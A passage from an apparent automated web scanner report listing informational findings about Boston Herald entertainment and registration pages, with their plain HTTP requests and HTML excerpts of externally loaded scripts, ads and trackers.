<a href="/track/inside_track/view.bg?articleid=1312537&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(32) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<a href="/track/track_gals_tv/"><img style="border: 1px solid rgb(102, 102, 102);" src="http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_315x100_animated.gif"></a>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/a37654_sheen_01282011.jpg" alt="Charlie Sheen." /></div>
...[SNIP]...
<div id="embedDiv">
<iframe src='http://widget.newsinc.com/2862.htm' frameborder='0' scrolling='no' height='350px' width='300px' style='border:solid 1px #bcbcbc'></iframe><p><iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/5fe4ec_ltpchsheen.jpg" alt="Actor Charlie Sheen hospitalized, publicist says" /></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110124matt_damon_likes_martin_sheens_psychic/"><img src="http://multimedia.heraldinteractive.com/images/20110124/stp/3affe6_matt_01242011.JPG" alt="Matt Damon likes Martin Sheen&rsquo;s psychic" /></a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.307. http://www.bostonherald.com/track/star_tracks/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/star_tracks/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /track/star_tracks/?srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:42:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>
//-->

   <link rel="alternate" title="Star Tracks - Inside Track - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/track/star_tracks/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Fstar_tracks%2F%3Forder%3DlastUpdate.desc&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/track/star_tracks/view/20110128startracks/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/67bc6f_beebs_01282011.jpg" alt="Justin Bieber."></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110128kate_hudson_on_baby_bump_it_feels_like_a_girl/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/a2c141_kate_01282011.jpg" alt="Kate Hudson."></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/98db3d_stew_01282011.jpg" alt="Kristen Stewart"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110127star_tracks/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/d842d2_Cruz_01272011.jpg" alt="Javier Bardem and Penelope Cruz"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110127bristol_palin_sought_as_sexual_responsibility_expert/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/ceceaa_Bristol_02242010.jpg" alt="Bristol Palin"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110127vince_neil_gets_15_days_for_dui/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/533087_Neil_01272011.jpg" alt="Motley Crue singer Vince Neil"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110127kate_middleton_and_prince_william_break_out_fax_machine/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/217acb_Prince_01192011.jpg" alt="Kate Middleton and Prince William"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110127complicated_custody_battle_for_padma_lakshmi/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/d0a387_Padma_01272011.jpg" alt="Padma Lakshmi "></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110127cheryl_burke_reveals_childhood_abuse/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/55954d_Burke_11052009.jpg" alt="Cheryl Burke"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110125lady_gaga_is_the_queen_of_social_networks/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/7015f7_gaga_12242010.jpg" alt="Lady GaGa"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110125keith_olbermann_may_write_for_cable_news_show/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/a146ce_keith_01252011.jpg" alt="Keith Olbermann."></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110125bret_michaels_to_have_surgery_again/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/abc7a8_brett_01252011.jpg" alt="Bret Michaels."></a>
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&amp;width=300&amp;height=300&amp;header=true&amp;colorscheme=light&amp;font&amp;border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.308. http://www.bostonherald.com/track/star_tracks/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/star_tracks/view.bg

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /track/star_tracks/view.bg?articleid=1312558 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:42:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="Star Tracks - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/track/star_tracks/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Fstar_tracks%2Fview%2F20110128kate_hudson_on_baby_bump_it_feels_like_a_girl%2Fsrvc%3Dtrack%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312558&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312558&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312558&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(0) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Kate Hudson on baby bump: &lsquo;It feels like a girl&rsquo;');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312558&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(0) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<a href="/track/track_gals_tv/"><img style="border: 1px solid rgb(102, 102, 102);" src="http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_315x100_animated.gif"></a>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/a2c141_kate_01282011.jpg" alt="Kate Hudson." /></div>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.309. http://www.bostonherald.com/users/register

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /users/register

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /users/register?srvc=slider HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 02:04:12 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Community - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/users/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fusers%2Fregister.bg%3Fsrvc%3Dslider&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
o activate your FREE account, submit the form below, then check your email inbox for instructions on how to confirm your account. (Note: We never share your information without your consent. See our <a href="http://www.heraldmedia.com/privacy.html">privacy policy</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
